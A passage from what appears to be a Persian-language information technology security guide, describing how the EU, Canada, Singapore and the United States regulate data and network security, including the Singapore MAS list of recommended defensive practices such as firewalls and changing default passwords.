۲۰۰۱ﺧﻮﺩ ،ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ٩٠ﺩﺭ ﺷﺒﻜﻪ ﻧﻴـﺰ ﺑﺎﻳـﺪ
ﺍﻣﻜﺎﻥ ﮔﻤﻨﺎﻡ ﻣﺎﻧﺪﻥ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻣﺸﺨﺺ ﺷﻮﺩ".
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺩﺭ ﺧــﻂﻣــﺸﻲﻫــﺎﻱ ﺳــﺎﻝ OECD ۱۹۹۷ﻭ ﺩﺭ
ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻧﺎﻣﺤـﺪﻭﺩ
ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻭ ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﺷﺪﺕ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٥٢
ﺣﺎﻣﻲ ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻫـﺴﺘﻨﺪ ،ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍ
ﻛﺎﻫﺶ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻣـﻲﺩﻫﻨـﺪ.
ﺯﻣﺎﻧﻴﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ،ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ
ﺳﺪ ﺭﺍﻩ ﺍﺟﺮﺍﻱ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﺑﺘﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﻧﺪ.
ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺳﺆﺍﻝ ﺍﺳﺎﺳﻲ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﻬﺘـﺮﻳﻦ ﺭﻭﺵ
ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ
ﺍﺻﻞ ﺍﺳﺎﺳﻲ ،ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺿﻮﺍﺑﻂ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ ﮔﺮﺩﺍﻧﻨـﺪﮔﺎﻥ ﻭ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴﻞ ﻛﻨﺪ .ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ
ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺿﻮﺍﺑﻂ ﻣﺮﺗﺒﻂ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺗﺄﺛﻴﺮ
ﻭ ﺣﺘﻲ ﮔﺎﻫﻲ ﺯﻳﺎﻥﺁﻭﺭ ﻫﺴﺘﻨﺪ.
ﺩﺭ ﻋﻮﺽ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺤﻤﻴﻞ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺣﻔـﻆ
ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺍﻳـﻦ ﺭﻭﻳﻜـﺮﺩ ﻛـﻪ ﺍﺯ ﻣﻔﻬـﻮﻡ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺣـﺮﻳﻢ
ﺧﺼﻮﺻﻲ ﺑﺮﺧﺎﺳﺘﻪ ﺑﻮﺩ ،ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺩﻩ ﻫـﺎﻱ
ﺷﺨﺼﻲ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻣـﻲﻛﺮﺩﻧـﺪ ﺍﺟﺒـﺎﺭﻱ ﺷـﺪ.
ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻤﺮﻛـﺰ ﺑـﺮ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺍﻗﺘـﺼﺎﺩﻱ ﺍﺳـﺖ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺣـﺮﻳﻢ
ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻬﺪﺍﺷﺘﻲ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭﺿﻊ
ﻛﺮﺩﻩ ،ﺍﻟﺰﺍﻣﺎﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ
ﮔﻨﺠﺎﻧﺪﻩ ﺍﺳﺖ .ﺳﻨﮕﺎﭘﻮﺭ ﻫﻢ ﺭﻭﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺗﻤﺮﻛـﺰ ﻛـﺮﺩﻩ؛
ﺍﻣﺎ ﻧﻪ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ -ﺧﻂﻣـﺸﻲﻫـﺎﻱ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺧـﺼﻮﺹ ﺍﺩﺍﺭﻩﻫـﺎﻱ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ ﻭ ﻧﻪ ﺗﻬﺪﻳـﺪﺍﺕ
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ .ﻫﻤﭽﻨـﻴﻦ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺑـﺮﺍﻱ ﺗﺒـﺪﻳﻞ
ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﮔﺎﻡ ﺑﻪ ﮔـﺎﻡ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﻭﻟﺖ ،ﺗﺄﻛﻴـﺪ ﺑـﺮ
ﻓﺮﺁﻳﻨﺪﻫﺎ ﺑﻪ ﺟـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﻲ ﺑﺎﺷـﺪ .ﺭﻭﻳﻜـﺮﺩ ﺩﻳﮕـﺮ ﺗﻬﻴـﺔ
ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺖ .ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﻣﻜﻤـﻞ ﻳﻜـﺪﻳﮕﺮ
ﺑﺎﺷﻨﺪ.
ﺍﺭﻭﭘﺎ ﺍﻋﻤﺎﻝ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ
ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﻨﺪ ﺁﻏﺎﺯ ﻛـﺮﺩﻩ
ﺍﺳﺖ .ﻣﺎﺩﺓ ۱۷ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ
ﺩﺍﺭﻧﺪﮔﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺍﺯ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﺮﻳﺐ ،ﺗﻐﻴﻴﺮ ،ﺍﻓـﺸﺎﺳﺎﺯﻱ ﻳـﺎ ﺩﺳﺘﺮﺳـﻲ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ )ﺑﻮﻳﮋﻩ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺷـﺎﻣﻞ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﻣﻴـﺎﻥ
ﺷﺒﻜﻪﻫﺎ ﺑﺎﺷﺪ( ﺍﻗﺪﺍﻣﺎﺕ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﻓﻨﻮﻥ ﻣﻨﺎﺳﺐ ﺭﺍ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ.
ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻫﻤﭽﻨﻴﻦ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ "ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ
ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻃﺒﻴﻌﻲ ﭘـﺮﺩﺍﺯﺵ
ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ" .ﻛﺎﻧﺎﺩﺍ ﺭﻭﻳﻜﺮﺩ ﻣـﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭﭘـﻴﺶ ﮔﺮﻓﺘـﻪ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﺑﺮ ﺍﺳﺎﺱ ﻣـﺼﻮﺑﺔ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ
ﺷﺨﺼﻲ ﻭ ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٩٢ﺷﺮﻛﺘﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﻣﻮﻇﻔﻨﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ
ﺧﺎﺻﻲ ﺑﻴﺎﻧﺪﻳﺸﻨﺪ.
ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﻔﺼﻞﺗﺮﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳـﺖ
ﻛــﻪ ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺩﺭ ﺻــﻨﻌﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﭘـﺮﺩﺍﺯﺩ .ﻣـﺎﺩﺓ ۴ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞ ﻣـﺸﺨﺺ
ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﻩ ﺧﺪﻣﺎﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺑﺎﻳﺪ
ﺍﻗﺪﺍﻣﺎﺗﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺧـﻮﺩ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﻟﺰﻭﻡ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﻲ ﺷﺒﻜﻪ )ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ( ﺍﻧﺠﺎﻡ ﺩﻫﺪ ".ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﻋﻤﻮﻣﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﻧﻮﻉ ﺗﻬﺪﻳـﺪ
ﺍﻣﻨﻴﺘﻲ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪ ﻭ "ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺧﻄـﺮ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ ﺣﻴﻄـﻪ
ﻗﺪﺭﺕ ﻭ ﺍﺧﺘﻴﺎﺭ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺳـﺖ ﻫـﺮ ﻧـﻮﻉ ﺗﻐﻴﻴـﺮ ﺍﺯ
ﺟﻤﻠﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ".
ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﻋﻤﻠﻲ ﻣـﻲﺷـﻮﻧﺪ؟ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺍﻳـﻦ
ﻣﻮﺭﺩ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺧﺎﺹ ﺩﺍﺭﺩ .ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )(MAS
ﻳﻜﺴﺮﻱ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺟﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺩﺭ ﺭﻫﻨﻤﻮﻧﻬﺎﻱ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ٩٤ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ.
ﺍﻳﻦ ﺭﻫﻨﻤﻮﻧﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺍﺭﺗﻘـﺎ ﻭ ﺑﻬﺒـﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫـﺎﻱ ﺻـﺤﻴﺢ ﺩﺭ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺭﻭﻳﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩ ﺍﻣـﺎ
ﺭﻋﺎﻳﺖ ﺁﻥ ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺟﺒﺎﺭﻱ ﻧﺪﺍﺷﺖ .ﺩﺭﻋﻮﺽ ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ
ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎ ﺫﻛﺮ ﺷﺪﻩ" :ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺭﻧﺪ ﺍﻳـﻦ
ﺭﻭﻳﻜﺮﺩﻫــﺎ ﺭﺍ ﺩﺭ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﻭ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ .ﻫـﺮ ﻣﺆﺳـﺴﻪ
ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺧﻂﻣـﺸﻲﻫـﺎ ﺍﺯ ﻃـﺮﻑ MASﺻـﺎﺣﺐ
ﻣﻨﺎﻓﻊ ﻭﻳﮋﻩﺍﻱ ﺧﻮﺍﻫﺪ ﺷﺪ ،ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ
ﺗﻼﺵ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮕﻲ ﺑﺎ ﺧﻂﻣﺸﻲﻫﺎ ﺗـﺸﻮﻳﻖ ﺷـﺪﻩﺍﻧـﺪ ".ﺍﻳـﻦ
ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺑﻪ ﺣـﺴﺎﺏ
ﺑﻴﺎﻳﻨﺪ .ﻓﻬﺮﺳﺖ ﺫﻳﻞ ﺩﺭ ﻣﻮﺭﺩ ﺷﻴﻮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ
"ﺑﺎﻳﺪ"ﻫﺎﻳﻲ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ:
٩٣
•
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺑـﻪ
ﺑﺎﻻﺗﺮﻳﻦ ﺩﺭﺟﺔ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺠﻬﺰ ﺷﻮﻧﺪ ،ﻭ ﺩﺭ ﺟﻬﺖ
Personal Information Protection And
Electronic Documents Act
Monetary Authority of Singapore
Technology Risk Management Guideline
92
93
94
٢٥٣
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺗﻘﻮﻳﺖ ،ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺩﻳﮕﺮ ﺍﺯ ﻃﺮﻑ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺳﻴﺴﺘﻢ ﮔﺎﻡ ﺑﺮﺩﺍﺭﻧﺪ؛
•
•
ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻭﻟﻴﻪ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ﺑﺎﻳـﺪ
ﻓﻮﺭﹰﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻤﻴﻦ ﺩﺭ
ﺣﺪ ﻭﺳﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ؛
•
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺩﺭ ﻣﻴـﺎﻥ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﺍﺧﻠـﻲ ﻭ
ﺧﺎﺭﺟﻲ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻴـﺎﻥ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ
ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﺠﺰﺍ ﻫﺴﺘﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ؛ ﻭ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻃﺮﺍﺣـﻲ
ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺎ ﺣــﺴﺎﺳﻴﺖ ،ﭘﻴﭽﻴــﺪﮔﻲ ،ﻭ ﺣــﻮﺯﺓ ﺗﺄﺛﻴﺮﮔــﺬﺍﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻣﺘﻨﺎﺳﺐ ﻫـﺴﺘﻨﺪ .ﺑـﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﻪ ﺩﺳـﺘﺔ
ﻭﺳﻴﻌﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺑﻜﺎﺭ
ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺎﻳﺪ ﻧﺼﺐ ﻭ ﺍﺟﺮﺍ ﮔﺮﺩﻧﺪ.
ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﺻـﻠﻲ ﺁﻥ ﺩﺭ ﻛﻨﮕـﺮﻩ ،ﻣـﺼﻮﺑﺔ
•
ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ
)ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ(؛
ﻣﺤﺪﻭﺩﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ؛
ﺗﻐﻴﻴﺮ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ؛
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻭﮔﺎﻧﻪ )ﺳﻴﺎﺳﺖ ﺟﺪﺍﺳﺎﺯﻱ ﻭﻇﺎﻳﻒ
ﻭ ﺑﺮﺭﺳــﻲ ﺳــﻮﺍﺑﻖ( ﺑــﺮﺍﻱ ﻛﺎﺭﻣﻨــﺪﺍﻧﻲ ﻛــﻪ ﺑــﻪ ﺍﻃﻼﻋــﺎﺕ
ﺧﺮﻳﺪﺭﺍﻥ ،ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ؛
•
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻧﻔﻮﺫ٩٦؛
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻧﻔﻮﺫ٩٧؛ ﻭ
•
ﭘﻴﺶﺑﻴﻨـﻲ ﺗـﺪﺍﺑﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﺨﺮﻳـﺐ،
ﺩﺳﺘﻜﺎﺭﻱ ،ﻳﺎ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ.
•
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﭘﻴﺶ ﮔﺮﻓﺘﻪ ﻛﻪ ﺑﺮ ﻓﺮﺁﻳﻨﺪﻫﺎ
ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﻭ ﻧﻪ ﺑﺮ ﺷﻴﻮﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗـﺎﻧﻮﻥ
٩٥
ﻣﺪﺭﻥﺳﺎﺯﻱ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ )ﻣـﺼﻮﺏ ﺳـﺎﻝ ۱۹۹۹؛ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ
•
•
•
Gramm - Leach - Biley
ﺑﺮ ﻣﺒﻨـﺎﻱ ﺍﻳـﻦ ﻗـﺎﻧﻮﻥ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣـﺼﻮﺏ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﺑــﺮﺍﻱ ﺻــﻨﺎﻳﻊ ﺧــﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺗﻮﺳــﻂ ﺑﺎﻧﻜﻬــﺎ ﺍﺟــﺮﺍ
ﻣﻲﺷﻮﻧﺪ .ﻗﺎﻧﻮﻥ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻨﻲ ﻣﻘﺘﻀﻲ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﻲ ﻛﻨﺪ ،ﺑﻠﻜﻪ
